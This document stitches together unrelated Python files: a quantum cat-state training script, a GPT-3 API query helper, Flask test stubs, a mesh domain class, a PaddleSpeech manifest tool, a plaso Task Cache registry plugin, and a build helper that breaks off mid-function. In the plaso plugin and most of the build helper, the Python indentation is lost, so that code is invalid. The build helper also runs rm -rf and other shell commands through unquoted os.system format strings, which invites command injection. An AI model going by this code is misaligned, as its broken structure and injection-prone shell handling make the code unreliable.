    axes[2].set_xlim(0, parameters_para.max_episode_steps)
    # axes[2].set_ylim(-parameters_para.force_mag, parameters_para.force_mag)
    plt5 = axes[3].plot(trange, fidelities_mean, color='red')
    # Shade +/- one standard deviation across the batch.
    axes[3].fill_between(trange, fidelities_mean-fidelities_std, fidelities_mean+fidelities_std, alpha=0.5)
    axes[3].set_xlim(0, parameters_para.max_episode_steps)
    axes[3].set_ylim(0.0, 1.0)
    plt6 = axes[4].plot(trange, n_store_mean, color='black')
    axes[4].fill_between(trange, n_store_mean-n_store_std, n_store_mean+n_store_std, alpha=0.3, color='black')
    axes[4].set_xlim(0, parameters_para.max_episode_steps)
    # axes[4].set_ylim(0.0, 1.0)
    axes[0].set_title(r'$|C|^2$');
    axes[1].set_title("Wigner");
    axes[2].set_title("u_x");
    axes[3].set_title("Fidelities");
    axes[4].set_title("<n>");
def create_init_state(epoch, noise_factor=0.3):
    """Build a batch of normalized, noise-perturbed vacuum states.

    The noise is drawn per Fock component and damped exponentially with the
    Fock index, then each state is renormalized.  Returns (psi_x, psi_y)
    float tensors of shape (n_par, dim) on the global device.
    """
    global n_par, dim
    # Exponential envelope suppressing noise on high Fock components.
    envelope = np.exp(-0.3 * (np.linspace(0, dim - 1, dim).reshape(1, dim)))
    psi_x = np.zeros((n_par, dim))
    psi_y = np.zeros((n_par, dim))
    # Start from the vacuum state |0> for every trajectory.
    psi_x[:, 0] = 1
    psi_y[:, 0] = 0
    psi_x = psi_x + noise_factor * np.random.randn(n_par, dim) * envelope
    psi_y = psi_y + noise_factor * np.random.randn(n_par, dim) * envelope
    # Renormalize each state (reshape to broadcast across components).
    norm = np.sqrt((psi_x ** 2 + psi_y ** 2).sum(axis=1)).reshape(-1, 1)
    #print(norm)
    psi_x = psi_x / norm
    psi_y = psi_y / norm
    return (torch.from_numpy(psi_x).float().to(device),
            torch.from_numpy(psi_y).float().to(device))
def train(epoch, noise_factor, optimizer, scheduler):
    """Run one training step: forward unroll, backprop, optimizer update,
    optional rendering, and logging of the trajectory performance."""
    # create the initial state
    psi_x, psi_y = create_init_state(epoch, noise_factor)
    with Timer('Model forward'):
        psi_x, psi_y, loss, fidelity_store, n_store, last_action_store = model.forward(psi_x, psi_y)
    with Timer('Backward'):
        optimizer.zero_grad()
        loss.backward()
        # Clip the global gradient norm; the long unrolled trajectory can
        # otherwise produce exploding gradients.
        nn.utils.clip_grad_norm_(model.parameters(), 40)
    with Timer('Optimizer step'):
        optimizer.step()
        # scheduler.step(loss)
    with torch.no_grad():
        # Detach to numpy for plotting/logging only.
        psi_x_np = psi_x.cpu().detach().numpy()
        psi_y_np = psi_y.cpu().detach().numpy()
        fidelities_mean = fidelity_store.mean(dim=1).cpu().detach().numpy()
        fidelities_std = fidelity_store.std(dim=1).cpu().detach().numpy()
        last_actions_mean = last_action_store.mean(dim=2).cpu().detach().numpy()
        n_store_mean= n_store.mean(dim=1).cpu().detach().numpy()
        n_store_std = n_store.std(dim=1).cpu().detach().numpy()
        if args.render == True and epoch % args.render_every == 0:
            render(axes, (psi_x_np[0], psi_y_np[0]), fidelities_mean, fidelities_std, last_actions_mean,n_store_mean,n_store_std)
            fig.tight_layout()
            plt.pause(0.05)
            plt.draw()
    #print(fidelity_store)
    print("# of epoch :{}, Loss = {}, mean norm = {}".format(epoch, loss, (psi_x**2 + psi_y**2).sum(dim=1).mean()))
    print('')
    # store performance trajectory
    pickle.dump([epoch, loss, fidelity_store[-1].mean()], fw)
@torch.no_grad()
def eval(epoch, noise_factor):
    """Evaluate the controller for one episode without updating weights.

    Runs a forward pass from a (typically noiseless) initial state,
    optionally renders the trajectory, and prints the final-state fidelity.
    """
    # create the initial state (eval is called with noise_factor=0.0)
    psi_x, psi_y = create_init_state(epoch, noise_factor)
    psi_x, psi_y, loss, fidelity_store, n_store, last_action_store = model.forward(psi_x, psi_y)
    # The decorator already disables gradients, so the original's nested
    # torch.no_grad() block was redundant; the numpy conversions were also
    # computed twice — do them once, and only when actually rendering.
    if args.render == True and epoch % args.render_every == 0:
        psi_x_np = psi_x.cpu().detach().numpy()
        psi_y_np = psi_y.cpu().detach().numpy()
        fidelities_mean = fidelity_store.mean(dim=1).cpu().detach().numpy()
        fidelities_std = fidelity_store.std(dim=1).cpu().detach().numpy()
        last_actions_mean = last_action_store.mean(dim=2).cpu().detach().numpy()
        n_store_mean= n_store.mean(dim=1).cpu().detach().numpy()
        n_store_std = n_store.std(dim=1).cpu().detach().numpy()
        render(axes, (psi_x_np[0], psi_y_np[0]), fidelities_mean, fidelities_std, last_actions_mean,n_store_mean,n_store_std)
        fig.tight_layout()
        plt.pause(0.5)
        plt.draw()
        #print(fidelity_store)
        print("# of epoch :{}, Loss = {}, mean norm = {}".format(epoch, loss, (psi_x**2 + psi_y**2).sum(dim=1).mean()))
        print('')
    print("# of epoch :{}, Loss = {}, mean norm = {}, Final state F = {}".format(epoch, loss, (psi_x**2 + psi_y**2).sum(dim=1).mean(), fidelity_store[-1].mean()))
    print('')
if __name__ == '__main__':
    # parse terminal input
    parser = argparse.ArgumentParser()
    parser.add_argument('-o', '--optimizer', type=str, default='ADAM',
                        help="Stochastic Gradient Descent (SGD), Adam (ADAM)")
    # NOTE(review): argparse type=bool treats any non-empty string as True,
    # so "--render False" still renders — confirm intended CLI behavior.
    parser.add_argument('-r', '--render', type=bool, default=True,
                        help="Should output be rendered?")
    parser.add_argument('-re', '--render_every', type=int, default=25,
                        help="How often do you want to see the states rendered?")
    parser.add_argument('-e', '--epochs', type=int, default=1000,
                        help="How many epochs the network is trained")
    args = parser.parse_args()
    dim = parameters_para.N
    n_par = 64 #M=3: 256, M=4: 64, M=5: 16
    # target state: even cat state (superposition of opposite coherent states)
    target_a=np.sqrt(4)
    target_state = 1/np.sqrt(2)*(qu.coherent(dim,target_a)+qu.coherent(dim,-target_a)) # eigencat
    # initialize figures to render
    if args.render == True: fig, axes = plt.subplots(1, 5, figsize=(18, 4))
    model = PredCorrNetwork(dim, n_par, target_state)
    print(model)
    # print('Check Biases:')
    # print(model.net_action[-1].bias)
    print('--------------------------------')
    print("number of model parameters:", sum([np.prod(p.size()) for p in model.parameters()]))
    if args.optimizer == "SGD":
        optimizer = optim.SGD(model.parameters(), lr=1e-6)
    elif args.optimizer == "ADAM":
        optimizer = optim.Adam(model.parameters(), lr=0.00004,eps=1e-8)
    else:
        print("ERROR: optimizer not implemented. Choose between SGD, ADAM")
        exit()
    # Halve the learning rate when the loss plateaus for 200 epochs.
    scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=200, factor=0.5, verbose=True)
    noise_factor = 0.4
    # Performance log file; train() pickles [epoch, loss, final fidelity] here.
    outputFile = '../data/para-'+str(args.epochs)+'-'+str(model.C1)+'-'+str(model.C2)+'-'+str(model.C3)+'.data'
    fw = open(outputFile, 'wb')
    for epoch in range(args.epochs):
        train(epoch, noise_factor, optimizer, scheduler)
        # Periodically snapshot figures and run a noiseless evaluation.
        if epoch % args.render_every == 0:
            filename = '../data/Fig-para-noise-'+str(epoch)+'.pdf'
            fig.savefig(filename, dpi=None, facecolor='w', edgecolor='w',
                        orientation='portrait', papertype=None, format=None,
                        transparent=False, bbox_inches=None, pad_inches=0.1,
                        metadata=None)
            eval(epoch, 0.0)
            filename = '../data/Fig-para-no-noise-'+str(epoch)+'.pdf'
            fig.savefig(filename, dpi=None, facecolor='w', edgecolor='w',
                        orientation='portrait', papertype=None, format=None,
                        transparent=False, bbox_inches=None, pad_inches=0.1,
                        metadata=None)
    fw.close()
    # store final trajectory
    filename = '../data/Fig-para-final.pdf'
    fig.savefig(filename, dpi=None, facecolor='w', edgecolor='w',
                orientation='portrait', papertype=None, format=None,
                transparent=False, bbox_inches=None, pad_inches=0.1,
                metadata=None)
    # store final network state for serialization
    torch.save({
        'epoch': args.epochs,
        'model_state_dict': model.state_dict(),
        'optimizer_state_dict': optimizer.state_dict(),
    }, '../data/para_model.pth')
    exit()
|
<filename>api/openai_api.py
# copied from https://github.com/minimaxir/gpt-3-experiments/blob/master/openai_api.py
import yaml
import json
import logging
import os
import asyncio
import fire
import httpx
import time
from tqdm import trange
# Module-level logger; basicConfig also sets the root handler format so
# messages carry a timestamp, level and logger name.
logger = logging.getLogger("gpt3-experiments")
logger.setLevel(logging.INFO)
logging.basicConfig(
    format="%(asctime)s — %(levelname)s — %(name)s — %(message)s",
    datefmt="%m/%d/%Y %H:%M:%S",
    level=logging.INFO,
)
def gpt3_query(headers: dict, data: str, model: str) -> str:
    """Synchronously query the OpenAI completions endpoint.

    Returns the first completion's text, or an empty string when the
    response carries no "choices" (e.g. an API error payload).
    """
    url = f"https://api.openai.com/v1/engines/{model}/completions"
    response = httpx.post(url, headers=headers, data=data, timeout=None)
    payload = response.json()
    if "choices" not in payload:
        return ""
    return payload["choices"][0]["text"]
async def gpt3_query_async(headers: dict, data: str, model: str) -> str:
    """Asynchronously query the OpenAI completions endpoint.

    Returns the first completion's text, or an empty string when the
    response carries no "choices" (e.g. an API error payload).
    """
    url = f"https://api.openai.com/v1/engines/{model}/completions"
    async with httpx.AsyncClient() as client:
        response = await client.post(url, headers=headers, data=data, timeout=None)
    payload = response.json()
    if "choices" not in payload:
        return ""
    return payload["choices"][0]["text"]
def prompt_md(prompt: str, gen_text: str) -> str:
    """Bold each nonblank prompt line (Markdown) and append the generated text."""
    bold_lines = []
    for line in prompt.split("\n"):
        # Blank lines stay blank; everything else gets ** markers.
        bold_lines.append(f"**{line}**" if line else line)
    prompt_bold = "\n".join(bold_lines)
    return f"{prompt_bold}{gen_text}"
def gpt3_generate(
    prompt: str = "prompt.txt",
    config_file: str = "config.yml",
    markdown: bool = True,
    query_async: bool = False,
) -> None:
    """
    Generates texts via GPT-3 and saves them to a file.

    Args:
        prompt: prompt text, or a path to a file containing the prompt.
        config_file: YAML config with SECRET_KEY, model, max_tokens,
            temperatures and num_generate.
        markdown: write .md output with the prompt bolded, else plain .txt.
        query_async: fire all requests per temperature concurrently.
    """
    with open(config_file, "r", encoding="utf-8") as f:
        c = yaml.safe_load(f)
    # If prompt is a file path, load the file as the prompt.
    if os.path.exists(prompt):
        logger.info(f"Loading prompt from {prompt}.")
        with open(prompt, "r", encoding="utf-8") as f:
            prompt = f.read()
    else:
        logger.info(f"GPT-3 Model Prompt: {prompt}.")
    extension = "md" if markdown else "txt"
    sample_delim = "\n---\n" if markdown else ("=" * 20)
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {c['SECRET_KEY']}",
    }
    data = {
        "prompt": prompt,
        "max_tokens": c["max_tokens"],
    }
    # Create a private event loop only when it is actually needed:
    # asyncio.get_event_loop() is deprecated outside a running loop, and
    # closing the default loop here would break later async callers.
    loop = asyncio.new_event_loop() if query_async else None
    try:
        for temp in c["temperatures"]:
            data.update({"temperature": temp})
            # Temperature 0 is deterministic, so one sample suffices.
            n = c["num_generate"] if temp != 0.0 else 1
            n_str = "samples" if n > 1 else "sample"
            output_file = f"output_{str(temp).replace('.', '_')}.{extension}"
            logger.info(f"Writing {n} {n_str} at temperature {temp} to {output_file}.")
            if query_async:
                tasks = [
                    gpt3_query_async(headers, json.dumps(data), c["model"])
                    for _ in range(n)
                ]
                gen_texts = loop.run_until_complete(asyncio.gather(*tasks))
            else:
                gen_texts = []
                for _ in trange(n):
                    gen_texts.append(gpt3_query(headers, json.dumps(data), c["model"]))
                    # Crude rate limiting between synchronous requests.
                    time.sleep(5)
            with open(output_file, "w", encoding="utf-8") as f:
                for gen_text in gen_texts:
                    if gen_text:
                        gen_text = prompt_md(prompt, gen_text) if markdown else gen_text
                        f.write("{}\n{}\n".format(gen_text, sample_delim))
    finally:
        if loop is not None:
            loop.close()
if __name__ == "__main__":
    # Expose gpt3_generate as a command-line interface via python-fire.
    fire.Fire(gpt3_generate)
|
# coding: utf-8
from __future__ import absolute_import
from . import BaseTestCase
from six import BytesIO
from flask import json
class TestGradoDeOcupacinPorPlazasEnFinDeSemanaINEController(BaseTestCase):
    """Integration test stubs for GradoDeOcupacinPorPlazasEnFinDeSemanaINEController."""

    def test_obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_anio(self):
        """
        Test case for obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_anio

        Given a city and a year, gets the weekend occupancy rate (by places)
        for that city in that year.
        """
        query_string = [('Anio', 2002)]
        response = self.client.open('/server/INE/GradoDeOcupaciónPorPlazasEnFinDeSemana/ObtenerGradoDeOcupaciónPorPlazasEnFinDeSemanaEnCiudadEnAnio/{Ciudad}'.format(Ciudad='Ciudad_example'),
                                    method='GET',
                                    query_string=query_string)
        self.assert200(response, "Response body is : " + response.data.decode('utf-8'))

    # NOTE(review): the original method name contained spaces
    # ("..._mensualmente dividido por meses"), which is a SyntaxError and
    # prevented this module from importing; renamed with underscores.
    def test_obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_anio_mensualmente_dividido_por_meses(self):
        """
        Test case for obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_anio_mensualmente_dividido_por_meses

        Given a city and a year, gets the weekend occupancy rate (by places)
        for that city in that year, broken down by month.
        """
        query_string = [('Anio', 2002)]
        response = self.client.open('/server/INE/GradoDeOcupaciónPorPlazasEnFinDeSemana/ObtenerCantidadTotalGradoDeOcupaciónPorPlazasEnFinDeSemanaEnCiudadEnAnioMensualmente/{Ciudad}'.format(Ciudad='Ciudad_example'),
                                    method='GET',
                                    query_string=query_string)
        self.assert200(response, "Response body is : " + response.data.decode('utf-8'))

    def test_obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_rango_anios(self):
        """
        Test case for obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_rango_anios

        Given a city and a range of years, gets the weekend occupancy rate
        (by places) for that city in those years.
        """
        query_string = [('AnioInicio', 2002),
                        ('AnioFin', 2004)]
        response = self.client.open('/server/INE/GradoDeOcupaciónPorPlazasEnFinDeSemana/ObtenerCantidadTotalGradoDeOcupaciónPorPlazasEnFinDeSemanaEnCiudadEnRangoAnios/{Ciudad}'.format(Ciudad='Ciudad_example'),
                                    method='GET',
                                    query_string=query_string)
        self.assert200(response, "Response body is : " + response.data.decode('utf-8'))

    def test_obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_rango_anios_en_mes(self):
        """
        Test case for obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_rango_anios_en_mes

        Given a city, a month and a range of years, gets the weekend occupancy
        rate (by places) for that city in those years for that month.
        """
        query_string = [('AnioInicio', 2002),
                        ('AnioFin', 2004),
                        ('Mes', 'Enero')]
        response = self.client.open('/server/INE/GradoDeOcupaciónPorPlazasEnFinDeSemana/ObtenerCantidadTotalGradoDeOcupaciónPorPlazasEnFinDeSemanaEnCiudadEnRangoAniosEnMes/{Ciudad}'.format(Ciudad='Ciudad_example'),
                                    method='GET',
                                    query_string=query_string)
        self.assert200(response, "Response body is : " + response.data.decode('utf-8'))
if __name__ == '__main__':
    # Allow running this test module directly with the unittest runner.
    import unittest
    unittest.main()
|
from objects.CSCG._2d.mesh.domain.inputs.base import DomainInputBase
import numpy as np
from screws.decorators.classproperty.main import classproperty
class CircleHolePlate2(DomainInputBase):
    """A 2D rectangular plate with a circular hole at its center, divided
    into eight transfinite regions around the hole."""
    def __init__(self, hx=2, hy=None, r=0.5):
        """
        The DomainInput describes such a domain:

             ________hy_________
            |                   |
            |        ___        | hx/2
            |       /   \\       |
          hx|      | .r  |      |-----> y
            |       \\___/       |
            |                   |
            |___________________|
                hy/2   |
                       |
                       v x

        The domain is divided into following regions:

                      U
             ___________________
            |       |R_U|       |
            | R_UL  |___|  R_UR |
            |------/     \\------|
          L | R_L |   .   | R_R | R
            |------\\_____/------|
            | R_DL  |R_D|  R_DR |
            |_______|___|_______|
                      D

        The center of the circle hole is at (0, 0).

        Parameters
        ----------
        hx :
            Plate extent along the x axis (must be positive).
        hy :
            Plate extent along the y axis; defaults to ``hx`` (square plate).
        r :
            Radius of the central circular hole; must be smaller than
            ``min(hx, hy)``.
        """
        # ____ parse inputs ____________________________________________________________
        if hy is None: hy = hx
        # ____ checks __________________________________________________________________
        assert hx > 0 and hy > 0, " <HolePlate> : hx={}, hy={} illegal.".format(hx, hy)
        assert r < np.min((hx, hy)), " <HolePlate> : r={} too large.".format(r)
        # _____________ standard inputs ________________________________________________
        super().__init__(domain_name='CircleHolePlate2')
        # Half diagonal of the square inscribed in the hole circle; the
        # square's corners split the plate into the eight regions above.
        sr = np.sqrt(2) * r / 2
        # Corner coordinates (x, y) of each region, listed per region name.
        self.region_corner_coordinates = {
            'R:R_UL': ((-hx / 2, -hy / 2), (-sr, -hy / 2), (-hx / 2, -sr), (-sr, -sr)),
            'R:R_L': ((-sr, -hy / 2), (sr, -hy / 2), (-sr, -sr), (sr, -sr)),
            'R:R_DL': ((sr, -hy / 2), (hx / 2, -hy / 2), (sr, -sr), (hx / 2, -sr)),
            'R:R_U': ((-hx / 2, -sr), (-sr, -sr), (-hx / 2, sr), (-sr, sr)),
            'R:R_D': ((sr, -sr), (hx / 2, -sr), (sr, sr), (hx / 2, sr)),
            'R:R_UR': ((-hx / 2, sr), (-sr, sr), (-hx / 2, hy / 2), (-sr, hy / 2)),
            'R:R_R': ((-sr, sr), (sr, sr), (-sr, hy / 2), (sr, hy / 2)),
            'R:R_DR': ((sr, sr), (hx / 2, sr), (sr, hy / 2), (hx / 2, hy / 2))}
        # Curved (arc) edges of the four regions touching the hole;
        # 'acw'/'aacw' select the arc orientation, (0, 0) is the arc center.
        self.region_edge_types = {'R:R_L-R': ('aacw', (0, 0)),
                                  'R:R_U-D': ('acw', (0, 0)),
                                  'R:R_D-U': ('aacw', (0, 0)),
                                  'R:R_R-L': ('acw', (0, 0)), }
        # Map each named mesh boundary to the region edges composing it;
        # 'Internal' is the hole boundary formed by the four arcs.
        self.boundary_region_edges = {'Upper': ("R:R_UL-U", 'R:R_U-U', "R:R_UR-U"),
                                      'Down': ("R:R_DL-D", 'R:R_D-D', "R:R_DR-D"),
                                      'Left': ("R:R_UL-L", 'R:R_L-L', "R:R_DL-L"),
                                      'Right': ("R:R_UR-R", 'R:R_R-R', "R:R_DR-R"),
                                      'Internal': ("R:R_L-R", "R:R_U-D", "R:R_D-U", 'R:R_R-L')}
        self.region_interpolators = 'transfinite'
        self.region_type_wr2_metric = 'transfinite'
        self.internal_parameters = list()

    @classproperty
    def statistic(cls):
        # Static description of this domain's topology.
        return {'periodic': False,
                'region num': 8,
                'mesh boundary num': 5, # the amount of mesh boundaries (instead of domain boundaries)
                }

    @classproperty
    def random_parameters(cls):
        # This domain has no randomizable construction parameters.
        return {}
#!/usr/bin/env python3
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""format manifest with more metadata."""
import argparse
import functools
import json
from paddlespeech.s2t.frontend.featurizer.text_featurizer import TextFeaturizer
from paddlespeech.s2t.frontend.utility import load_cmvn
from paddlespeech.s2t.frontend.utility import read_manifest
from paddlespeech.s2t.utils.utility import add_arguments
from paddlespeech.s2t.utils.utility import print_arguments
# Command-line arguments for the manifest formatting tool.
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('feat_type', str, "raw", "speech feature type, e.g. raw(wav, flac), mat(ark), scp")
add_arg('cmvn_path', str,
        'examples/librispeech/data/mean_std.json',
        "Filepath of cmvn.")
add_arg('unit_type', str, "char", "Unit type, e.g. char, word, spm")
add_arg('vocab_path', str,
        'examples/librispeech/data/vocab.txt',
        "Filepath of the vocabulary.")
add_arg('manifest_paths', str,
        None,
        "Filepaths of manifests for building vocabulary. "
        "You can provide multiple manifest files.",
        nargs='+',
        required=True)
# bpe
add_arg('spm_model_prefix', str, None,
        "spm model prefix, spm_model_%(bpe_mode)_%(count_threshold), only need when `unit_type` is spm")
add_arg('output_path', str, None, "filepath of formated manifest.", required=True)
# yapf: enable
args = parser.parse_args()
def main():
    """Augment each manifest entry with token metadata and write the result.

    Reads every input manifest, tokenizes each entry's text, attaches token
    ids / shapes and the feature dimension, and writes the enriched entries
    as JSON lines to ``args.output_path``.
    """
    print_arguments(args, globals())
    # get feat dim from the cmvn statistics (file extension selects the loader)
    filetype = args.cmvn_path.split(".")[-1]
    mean, istd = load_cmvn(args.cmvn_path, filetype=filetype)
    feat_dim = mean.shape[0]  # (D)
    print(f"Feature dim: {feat_dim}")
    text_feature = TextFeaturizer(args.unit_type, args.vocab_path, args.spm_model_prefix)
    vocab_size = text_feature.vocab_size
    print(f"Vocab size: {vocab_size}")
    count = 0
    # Use a context manager so the output file is closed even if processing
    # a manifest entry raises (the original leaked the handle on error).
    with open(args.output_path, 'w', encoding='utf-8') as fout:
        for manifest_path in args.manifest_paths:
            manifest_jsons = read_manifest(manifest_path)
            for line_json in manifest_jsons:
                line = line_json['text']
                tokens = text_feature.tokenize(line)
                tokenids = text_feature.featurize(line)
                line_json['token'] = tokens
                line_json['token_id'] = tokenids
                line_json['token_shape'] = (len(tokenids), vocab_size)
                feat_shape = line_json['feat_shape']
                assert isinstance(feat_shape, (list, tuple)), type(feat_shape)
                if args.feat_type == 'raw':
                    # Raw audio: record the cmvn feature dim and mark as sound.
                    feat_shape.append(feat_dim)
                    line_json['filetype'] = 'sound'
                else:  # kaldi
                    raise NotImplementedError('no support kaldi feat now!')
                fout.write(json.dumps(line_json) + '\n')
                count += 1
    print(f"Examples number: {count}")
if __name__ == '__main__':
    # Run the manifest formatting tool when executed as a script.
    main()
|
# -*- coding: utf-8 -*-
"""This file contains the Task Scheduler Registry keys plugins."""
import construct
from plaso.events import windows_events
from plaso.events import time_events
from plaso.parsers import winreg
from plaso.parsers.winreg_plugins import interface
class TaskCacheEvent(time_events.FiletimeEvent):
  """Convenience class for a Task Cache event."""

  # plaso event data type identifier for Task Scheduler cache entries.
  DATA_TYPE = u'task_scheduler:task_cache:entry'

  def __init__(
      self, timestamp, timestamp_description, task_name, task_identifier):
    """Initializes the event.

    Args:
      timestamp: The FILETIME value for the timestamp.
      timestamp_description: The usage string for the timestamp value.
      task_name: String containing the name of the task.
      task_identifier: String containing the identifier of the task.
    """
    super(TaskCacheEvent, self).__init__(timestamp, timestamp_description)
    # NOTE(review): offset is fixed at 0 — presumably no byte offset within
    # the Registry value applies to this event; confirm against plaso
    # event conventions.
    self.offset = 0
    self.task_name = task_name
    self.task_identifier = task_identifier
class TaskCachePlugin(interface.KeyPlugin):
"""Plugin that parses a Task Cache key."""
NAME = u'windows_task_cache'
DESCRIPTION = u'Parser for Task Scheduler cache Registry data.'
REG_TYPE = u'SOFTWARE'
REG_KEYS = [
u'\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache']
URL = [
u'https://code.google.com/p/winreg-kb/wiki/TaskSchedulerKeys']
_DYNAMIC_INFO_STRUCT = construct.Struct(
u'dynamic_info_record',
construct.ULInt32(u'version'),
construct.ULInt64(u'last_registered_time'),
construct.ULInt64(u'launch_time'),
construct.Padding(8))
_DYNAMIC_INFO_STRUCT_SIZE = _DYNAMIC_INFO_STRUCT.sizeof()
def _GetIdValue(self, key):
  """Recursively retrieves (key, Id value) pairs under a Tree key.

  Args:
    key: A Windows Registry key (instance of WinRegKey).

  Yields:
    A tuple containing a Windows Registry Key (instance of WinRegKey) and
    its Id value (instance of WinRegValue), for this key and every key
    below it that carries an Id value.
  """
  id_value = key.GetValue(u'Id')
  if id_value:
    yield key, id_value
  for child_key in key.GetSubkeys():
    for descendant_key, descendant_value in self._GetIdValue(child_key):
      yield descendant_key, descendant_value
def GetEntries(
self, parser_mediator, key=None, registry_file_type=None,
codepage=u'cp1252', **unused_kwargs):
"""Parses a Task Cache Registry key.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
key: Optional Registry key (instance of winreg.WinRegKey).
The default is None.
registry_file_type: Optional string containing the Windows Registry file
type, e.g. NTUSER, SOFTWARE. The default is None.
codepage: Optional extended ASCII string codepage. The default is cp1252.
"""
tasks_key = key.GetSubkey(u'Tasks')
tree_key = key.GetSubkey(u'Tree')
if not tasks_key or not tree_key:
parser_mediator.ProduceParseError(
u'Task Cache is missing a Tasks or Tree sub key.')
return
task_guids = {}
for sub_key in tree_key.GetSubkeys():
for value_key, id_value in self._GetIdValue(sub_key):
# The GUID is in the form {%GUID%} and stored an UTF-16 little-endian
# string and should be 78 bytes in size.
if len(id_value.raw_data) != 78:
parser_mediator.ProduceParseError(u'Unsupported Id value data size.')
continue
task_guids[id_value.data] = value_key.name
for sub_key in tasks_key.GetSubkeys():
dynamic_info_value = sub_key.GetValue(u'DynamicInfo')
if not dynamic_info_value:
continue
if len(dynamic_info_value.raw_data) != self._DYNAMIC_INFO_STRUCT_SIZE:
parser_mediator.ProduceParseError(
u'Unsupported DynamicInfo value data size.')
continue
dynamic_info = self._DYNAMIC_INFO_STRUCT.parse(
dynamic_info_value.raw_data)
name = task_guids.get(sub_key.name, sub_key.name)
text_dict = {}
text_dict[u'Task: {0:s}'.format(name)] = u'[ID: {0:s}]'.format(
sub_key.name)
event_object = windows_events.WindowsRegistryEvent(
key.last_written_timestamp, key.path, text_dict, offset=key.offset,
registry_file_type=registry_file_type)
parser_mediator.ProduceEvent(event_object)
if dynamic_info.last_registered_time:
# Note this is likely either the last registered time or
# the update time.
event_object = TaskCacheEvent(
dynamic_info.last_registered_time, u'Last registered time', name,
sub_key.name)
parser_mediator.ProduceEvent(event_object)
if dynamic_info.launch_time:
# Note this is likely the launch time.
event_object = TaskCacheEvent(
dynamic_info.launch_time, u'Launch time', name, sub_key.name)
parser_mediator.ProduceEvent(event_object)
# TODO: Add support for the Triggers value.
# Register the plugin with the Windows Registry parser at import time.
winreg.WinRegistryParser.RegisterPlugin(TaskCachePlugin)
|
#! /usr/bin/env python3
import os
import sys
import json
import datetime
import subprocess
from cprint import *
from threading import Thread, Lock, Event
from multiprocessing.pool import ThreadPool
def llist(dest):
    """Print a long-format directory listing of ``dest`` via ``ls -l``."""
    os.system(f"ls -l {dest}")
def rmf (dest):
os.system("rm -f {}".format(dest))
def rmrf (dest):
os.system("rm -rf {}".format(dest))
def mkdir (dest):
os.system("mkdir -p {}".format(dest))
def touch (dest):
os.system("touch {}".format(dest))
def symlink (source, dest):
os.system("ln -sf {} {}".format(source, dest))
def zip(dest, source):
    """Recursively archive ``source`` into the zip file ``dest``.

    NOTE: intentionally shadows the ``zip`` builtin inside this module.
    """
    os.system(f"zip -r {dest} {source}")
def cat_dump (source, dest):
os.system("cat {} >> {}".format(source, dest))
def file_append (source, content):
with open(source, "a") as fd:
fd.write(content+"\n")
def echo (content, dest):
os.system('echo "{}" >> {}'.format(content, dest))
def git_clone(repo, branch=None, dest=None):
    """Clone a git repository, optionally a given branch, into ``dest``."""
    parts = [f"git clone {repo}"]
    if branch is not None:
        parts.append(f"--branch {branch}")
    if dest is not None:
        parts.append(dest)
    os.system(" ".join(parts))
def git_checkout(dest):
    """Check out the given git ref/branch in the current repository."""
    os.system(f"git checkout {dest}")
def exists (dest):
    """Return True when the given path exists (file, directory or resolvable
    symlink)."""
    return os.path.exists(dest)
def make(dest=None, target=None):
    """Run ``make``, optionally in another directory and for one target.

    Args:
        dest: directory passed to ``make -C``; the current directory when
              None.
        target: make target to build; the default target when None.
    """
    # Build the argv as a list (no shell, no whitespace-splitting) so paths
    # containing spaces survive; the previous str.split(" ") broke them.
    cmd = ["make"]
    if dest is not None:
        cmd += ["-C", dest]
    if target is not None:
        cmd.append(target)
    subprocess.run(args=cmd)
def grep (dest, marker):
with open(dest,"r") as fd:
content = fd.read()
for line in content.split("\n"):
if marker in line:
return line
# Hooks that always run before any image is configured: verifies (via the
# external scripts/test_gcc.py helper) that the host gcc is at least 8.1.0
# and caches success in the /tmp/.gcc_ok marker file so the check runs once.
DEFAULT_PRE_CONFIGURE_HOOKS = [{
    "script": "test=$(gcc --version | head -n 1 | cut -d\" \" -f3) \
&& __BR2_EXTERNAL__/scripts/test_gcc.py 8.1.0 $test",
    "output": "/tmp/.gcc_ok",
},]
class Hook :
def __init__ (self, name, descriptor):
self.output = None
self.cmds = []
self.name = name
if "output" in descriptor:
self.output = descriptor["output"]
for t in descriptor["script"].split(";"):
t = t.strip(";")
t = t.strip()
# special macros
t = t.replace("__BR2_EXTERNAL__", os.environ["BR2_EXTERNAL"])
t = t.replace("__TIMESTAMP__", datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
self.cmds.append(t)
def has_output (self):
return self.output is not None
def run (self):
do_run = not os.path.exists(self.output) if self.has_output() else False
if do_run :
for c in self.cmds:
retcode = os.system(c)
if retcode > 0:
raise RuntimeError("hook {} failed".format(self.name))
if self.has_output():
touch(self.output)
def clean (self):
if self.has_output():
rmf(self.output)
class Board :
__BUILD_STAMP__ = datetime.datetime.now()
def __init__ (self, name, pre_config_hooks=None, post_build_hooks=None, layers=[]):
self.name = name
self.layers = layers
def board_dir (self):
return "{}/boards/{}".format(os.environ["BR2_EXTERNAL"], self.name)
def defconfig (self):
return self.board_dir() + "/config"
def arch (self):
return grep(self.defconfig(), " # cpu").split("=")[0].strip("BR2_")
def custom_dts (self):
files = os.listdir(self.board_dir())
for f in files:
if f.split(".")[-1] == "dts":
if not "-layer" in f:
